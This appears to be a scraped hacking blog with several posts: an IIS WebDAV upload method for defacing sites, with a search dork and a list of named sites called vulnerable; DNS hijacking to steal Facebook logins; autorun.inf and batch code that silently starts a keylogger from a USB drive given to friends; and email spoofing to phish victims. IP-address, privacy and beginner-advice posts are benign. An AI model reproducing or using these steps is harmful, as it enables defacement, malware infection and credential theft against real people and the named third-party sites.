How to Hack websites using IIS exploit | IIS File Upload exploit

This tutorial is about website hacking that are working on older versions of IIS server. We will be discussing about what is a IIS server and how to upload deface pages on it.

 

Q) What is IIS Server ?
A) IIS [Internet Information Service] is a web server developed by Microsoft to use with Mircosoft Operating systems.

How to Use IIS exploit :-

For Windows XP :
1)Go to start the click on run.
2)Copy the folowing code and paste it in run command:-

%WINDIR%EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::     {BDEADF00-C265-11d0-BCED-00A0C90AB50F}

3)Click on ok.
4)A folder named “Web Folders” will open.
5)Right click in the folder and click on “New” and then click on “Web folder”.
6)A dialogue box will open.
7)Enter the url of the vulnerable site and click on next.
8)If no error comes up the sites is vulnerable else try any other siite.
9)After pressing “Next” in step 7 it will ask you to name that web folder, enter any name you want.
10)Open that folder and copy your defaced html page to that folder.
 
For windows 7:
1) Go to My computer >> Right Click >> Select “Add a Network Location” .
2) Click on “Next” >> Choose the first option in the next screen >> Click “Next “.
3) Now enter the URL of the Vulnerable Site and Click on “Next” .
4) Now you will see a folder with name of that site, Open that folder and upload that file.

The link to your defaced page will be like “”http://vulnerablesite.net/mypage.html”" 
where mypage.html is the defaced page i uploaded.


Dork : “Powered By IIS ”
Search this dork in google to search for vulnerable sites.
Some Vulnerable site:-
z6.cn
derakhshan.parniansis.com
ebnesina.parniansis.com
emkhaleghiyeyzd.parniansis.com

Read More

DNS Hijacking | How to hack Facebook accounts using it

Hi Guys, I am back after a long time and I have got something amazing for you guys. In this tutorial I am going to show you how to Hack facebook accounts by DNS hijacking!

WHAT IS DNS?

 is a network protocol whose job is to map a user friendly name like tutorials for you to its corresponding IP address like “173.245.61.120″.

What is DNS Hijacking?

DNS HIjacking also known as (DNS redirection), is a kind of malicious attack that overrides a computer’s TCP/IP settings to direct it at a fake DNS server, thereby disconfirming the default DNS settings.As we tend to all recognize, the “Domain Name System (DNS)” is there to translate a user friendly name like “google.com” to its corresponding IP Address “74.125.235.46″.

So How DNS Hijacking Works?

As mentioned before, DNS is that the one that’s responsible for mapping the user friendly domain names to their corresponding IP addresses. This DNS server is closely-held and maintained by your Internet service Provider(ISP) and lots of alternative business organizations.
By default, your laptop is organized to use the DNS server from the ISP. In some cases, your laptop could even use the DNS services of alternative organizations like Google or OpenDNS. Imagine a scenario wherever a hacker or a malware program gains unauthorized access to your laptop and changes the DNS settings, so your laptop currently uses one amongst the malicious DNS servers that’s maintained by the hacker. once this happens, the malicious DNS server could translate domain names of interesting websites (such as banks, search engines, social networking sites etc.) to IP addresses of malicious websites having a similar design to original site. As a result, you will be taken to a pretended web site rather than the one you’re intending for.

What are the Dangers of DNS Hijacking?

The dangers of DNS hijacking will vary and depend upon the intention behind the attack. several ISPs like “OpenDNS” and “Comcast” use DNS hijacking for introducing advertisements or aggregation statistics. Even though doing this may cause no serious harm to the users, it’s thought-about as a violation of RFC standards for DNS responses.

Other dangers of DNS hijacking :

Pharming: This is often a sort of attack wherever a web site’s traffic is redirected to a different website that’s a faux one. As an example, once a user tries to go to a social networking web site like Facebook.com he is also redirected to a different web site that’s stuffed with pop-ups and advertisements, this is often done by hackers so as to come up with advertising revenue.

Phishing: This is often a sort of attack wherever users is redirected to a malicious web site whose style (look and feel) matches specifically with the initial one. As an example, once a user tries to log in to his checking account, he is redirected to a malicious website that steals his login details.
So this way 1 can hack facebook accounts. He can create a program to change your DNS address and could redirect it to his rogue DNS address. That DNS will redirect the request of facebook.com to some fake Facebook site, a Facebook phisher which could steal your login credentials.
To know more about Phishing, read What is Phishing How to Hack Facebook accounts using Phishing

How to Prevent DNS Hijacking?

In most cases, attackers create use of malware programs like a worm to carry out DNS hijacking. These DNS hijacking trojans are usually distributed as video and audio codecs, video downloaders, YouTube downloaders or as alternative free utilities. So, so as to remain protected, it’s suggested to remain aloof from untrusted websites that supply free downloads. The DNSChanger trojan is a very good example of 1 such malware that hijacked the DNS settings of over four million computers to drive a profit of concerning fourteen million USD through deceitful advertising revenue.

Also, it’s necessary to change the default password of your router, in order to stop someone to change your router settings to exploit your DNS settings to hack you.
Installing an original antivirus program and keeping it up-to-date offers an excellent deal of protection to your pc against any such attacks.

What if you are already a victim of DNS hijacking?

If you think that your laptop is infected with a malware program like DNSChanger, do not panic. All you have got to try and do is, simply verify your current DNS settings to check if the DNS address is the same as that provided by your ISPs. Otherwise re-configure your DNS settings as per the rules of your ISP.

I hope you would like my articles related to Hacking and Security!
Leave your queries and feedbacks in comments.

Read More

What is Autorun.inf and how to use it ? | Autorun.inf Virus

This tutorial is about using autorun.inf file to spread keylogger/rat via pendrive or another removable device. A detailed tutorial about autorun virus. Read this post carefully and don’t forget to leave your feedback comments in.
In windows XP it will automatically execute the instructions while in other versions of windows it will ask the user .

Q)what is autorun.inf ?

A) Autorun.inf file is a simple text file containing list of instructions to be followed by the Operating System. Whenever a CD/USB is plugged in, the system searches for this autorun file, and if found it executes all the instructions present in this file.

Q) Why it is used?

A) It is used to execute files automatically whenever a CD/Usb is plugged in. It can also change the icon of the usb/cd drive .

Steps:-

1) Creating autorun.inf :-
1.a) Open notepad and copy the followig code to it.
[autorun]
open=autorun.bat
icon=anything.ico

Here autorun.bat is the file we want to execute when our CD/USB is inserted.
Anything.ico is the name of icon file we want to set to our CD/USB drive.

2) Creating autorun.bat :-
2.a) Copy the following code [Edit it accordingly]
@echo off
start /location of the keylogger

Ex 1 :- If it is saved in a folder named rishabh which is present in the root directory of CD/USB. Then the code should be edited like this
@echo off
start rishabh/keylogger.exe

Ex 2 :- If the keylogger is placed in theroot directory then the code should be like this :-
@echo off
start keylooger.exe

2.b) Save it as autorun.bat and place it in the root directory of the CD/USB.

3) Give this CD/USB to your friends and when they will insert this in their systems, the will be infected with your keylooger.

Disabling Autorun :

1) Go to RUN and type gpedit.msc and hit ok.
2) Browse toComputer Configuration >>Administrative Templates >> Windows Components >>Autoplay Policies .
3) In details pane, double-click Turn off Autoplay.
4) Click Enabled, and then select All drives in the Turn off Autoplay box to disable Autorun on all drives.

IMPORTANT NOTE :- This guide is for academic purposes solely, Use at your own risk.

Read More

IP address – The Complete Guide | What is an IP address

Ip Address – The complete info
What is an IP address ?
The complete tutorial about what is an IP address, types of IP address, uses of IP address and much more. 
Read this awesome post to know more about IP address. 

Q) What is an ip address?
A) An Ip address is a label assigned to every device connected to a network or internet.Any device connected to internet could use this label to connect to another device connected to internet.

Types of ip addresses :-
1) Dynamic ip : These types of ip are always changing. Mostly broadband connections have these type of IP. These are assigned automatically by your ISP.

2) Static ip : These ip addresses don’t change. They remain same. You either had to buy one from your ISP or sometimes it comes free with your plan.

3)Public ip : Public ip address makes your device accessible to other users of internet. Anyone on internet can connect to your server using your PUBLIC IP.
To check your Public IP visit :
whatismyip.com

4)Private ip: Private ip is an ip address assigned to devices on a private network like computers present in your school/college have different Private ip address. It is used to communicate between computers on a Private network connected using hub/switch or any other way. To check your Private ip :

4.a)Open cmd .
4.b)Type ipconfig and hit enter.
4.c)The number shown against Ip Address is your Private ip.
You could assign Private ip on your own by :-
4.1)Double click on network connection icon in taskbar.
4.2)Click on Properties.
4.3)Click on internet protocol(tcp/ip).
4.4)Tick on “use this configuration”.
4.5)Enter your details.
4.6)Click on Ok.

Example scenario:
1) Let us suppose a computer Lab A in a school containing 20 computers all connected to each other using a switch and connected to a Modem[ all 20 to a single modem].
Then their *Private ip* address could be checked at cmd via point 4). This  *Private ip* is  mostly *STATIC* .
But their *Public ip* will be same as they are connected to internet via same route ie same modem. This *Public ip* will be assigned by the ISP and may or may not be *Dynamic*.

2) Let us take another computer lab B with same configuration as lab A. Now let us suppose computer xyz. It will definately have a different *Public Ip* as compared to Lab A, but it may or may not have same *Private ip* as that of any computer in Lab A.
There is one more thing, two devices could never have same Private ip connected to a same network. But two devices connected to different network may or may not have same Private ip.
This mean two computers either from lab A or B, both could have same *Public ip* but can never have same *Private ip*.

Example Explained :
Xyz computer From lab A:
Private ip : aaa.bbb.ccc.ddd [Generally STATIC]
Public Ip : xxx.yyy.zzz.www [Anything assigned by ISP, could be *DYNAMIC* or *STATIC* depending on your subscription]

abcd From Lab B
Private Ip : eee.fff.ggg.hhh [this could be same as Private IP of XYZ in Lab A, Generally STATIC]
Public Ip : qqq.eee.www.ttt [This could never be same as that of lab A, anything assigned by ISP, could be *DYNAMIC* or *STATIC* depending on your subscription]

In my next post i will discuss about IP addresses in even more detailed way.
Stay updated! Thank You!

Read More

Top 5 Ways to Protect Your Privacy Before Facebook Gets Hacked

Nowadays the only social networking site that has become popular among the younger generations is FACEBOOK. Almost 7% of the world’s population is on facebook. Along with numerous benefits it has it’s disadvantages too. The most common threat that an facebook user gets is his facebook account getting hacked by someone. We often get certain messages while we login to our facebook account that your account was being opened by an unauthorised person from an unknown place but we don’t take it seriously. Due to this small mistake you will pay a larger cost later in the future. it is very clear that this happens because due to our mistake that our privacy has been leaked to someone. So in order to protect your privacy of the facebook account here are some steps you should properly follow.

1. Change your name:

Don’t provide your real name while creating your Facebook account for the instance just use your nickname because if unfortunately your Facebook account gets hacked in future you would be in a situation to create a new account. Don’t be of the opinion that making a number of account is a crime because according to John Sileo the privacy expert of Facebook 80% of the people on Facebook have multiple Facebook accounts.

2. Stop geo-tagging your photos.

First let me tell you what is geo-tagging, it provides the information like the latitudes and longitudes of the photo taken and uploaded on the Facebook i.e. home ,school etc. if you are an iPhone user then just glance over for a second to your “settings”, go to “privacy” and turn off the location services for all the applications in the phone or just for an individual application like camera.

3. Lie about your age.

Girls might be pretty aware of this cause they never tell their exact age anywhere in this world. But seriously always steal your birth identity if not just try to change the year. I know it feels very happy to get birthday posts on your wall but believe me it’s for your safer side only.

4. Don’t store your credit card information on the site.

In the advanced versions of Facebook there are many games, applications etc, that require your credit information about your credit card number, it’s validity etc. But for your well being try not to provide them with certain information because they can use these things in other wrong processes.

5. Have some boundaries.

Have certain limits in life and in everything that you do in your life. Anything in excess is very dangerous. Have fun with Facebook but enjoy responsibly. Try to say “no” to the things that are wrong. When Facebook asks you questions about the photo that you have uploaded like who is in this photo, where the photo was taken ? Skip these questions. Do not upload address of your new house because for a thief it would just be a welcome invitation letter.

That's all for today, Thanks for reading.

Read More

How to send an anonymous email | Create fake email sender

Hi guys! I am back with another amazing and mind blowing tutorials for my reader. In this tutorial I am going to explain you how to send an anonymous email to someone. You must be thinking what is the purpose to send an anonymous email, I will be explaining that too in this detailed post.

What is Email Spoofing?

Email Spoofing is a process of faking source address of an Email. It means that we can show that email has been sent from someone else. This could be quite useful in various client side hacking techniques and is an important part of Social Engineering.
Using Email Spoofing techniques you can send fake emails to users to win their trust in order to execute our attack. Since the source address will be fake(Probably a mail from some famous trusted company) our victim will believe the mail and will be hacked.

Example use of Email Spoofing :

You can create a Facebook password change form having looks similar to that of Facebook, after that you send the link of the online form to the victim by spoofing the source address as of Facebook like password@facebook.com or something like that. This way user will believe that the mail is from Facebook and will surely enter his credentials.

How to send an anonymous mail :

Now let us discuss about the actual steps involved in sending anonymous or fake mails.

1) You first need an fake email sender. You could either use some online fake email senderlike :

Emkei.cz
anonymailer.net
Anonymizer.in

Or You could even create your own Fake email sender.

2) To create Your own Email account Spoofer you need following things :

2.1) Fake Email Sender script : This script is a PHP mail script using which we can change the source address of an email. Download it from here.

2.2) Free hosting service : You need a hosting service in order to host the PHP mail file. There are many free hosting services which provides a free domain too. We will use some free service like x10hosting.com. Create an account there an upload your php file there. Your link will be username.x10hosting.com/mail.php.
You could also try some other free web hosting service like :
phpnet.us
0000webhost.com
zymic.com

3) So now you have your own Fake Email sender. You now have to use this script to send fake emails to your victim.

4) In receiver’s address add the email id of your victim.

5) In sender’s address add the email of some reputed company like contact@facebook.comor something like that.

6) Enter a legit looking subject and message in order to make the victim believe in our email. Just click on send button after that. Your victim will the receive a email fromcontact@facebook.com

Chechout the image for information :

7) You can use the same way to send fake mails from any Email ID to any other Email ID.

So far we have discussed about how to send an anonymous email. Now I will tell you how you can distinguish between original and fake emails to prevent yourself from frauds. You can check the emails you doubt using the following to check whether their source is legit or not.

To check Email source follow these steps :

1) Open the email you want to check whether it is fake or not.

2) Open the Email header for that Email. To open headers for an email click on “Show headers” or “Show original” ( depends on the email service you are using).

3) There you will see a field of “received from : “, You will see a IP address against that field.

4) Copy the IP Address and trace its location.( Will explain tracing location too in my next post.)

I hope you will not use the information explained above for any type of blackhat purpose. Keep learning and Keep visiting

Read More

5 Things Every Beginner Hacker Should Know

Hello All,
This is my first blog post!

This post is for everyone out there who actually want to become a true hacker:-

1) Never trust sites that ask you for money in return of Hacking Softwares or who claim to Hack Email Id’s in return of money. All such things are Scam . Nothing Works.

2) There is NO DIRECT SOFTWARE  to Hack Facebook , Google , Yahoo or any other big website. All the softwares that claim to do so are scam. They are just meant to take your money and in worse cases, those softwares have trojans or keyloggers in them. As a result your account gets hacked trying to hack others.

3) NEVER EVER use the keyloggers or trojans you find as freeware on internet. Hackers are not fools. They compile keyloggers and trojans almost with any such software and when you install them , you are already hacked before even trying to hack others.

4) You are never going to be a good hacker without the knowledge of programming and scripting languages. When you are going to use only ready made softwares and would depend on them for hacking anything then your functionality would be limited upto the functionality of the software. When you are not going to use your brain , just doing the copy paste thing, then how can you even think of being a good hacker.

5) If you are a good Hacker, you already become a good programmer , a good script writer , a good web developer and an excellent security expert. Well any good Hacker will/should have good knowledge of various aspects and programming languages. to do XSS (Cross Site Scripting ) , PHP INJECTION , SQL INJECTION , PHISHING , FOOTPRINTING etc… you will have to be good at programing and scripting. And when you know the Various loop holes , vulnerabilities and security tips, you already become a Computer Security Expert.

So Never Ever Under estimate the term Hacker. A Hacker Is Not a person who just hacks email id’s or servers but a True Hacker is a Computer Genius who the knowledge of computers more than anyone.

Next time think before asking the question – “How much Will I get in this field?” because, if you have so many skills , you really don’t have to run after money. Success comes and money follows itself.

Read More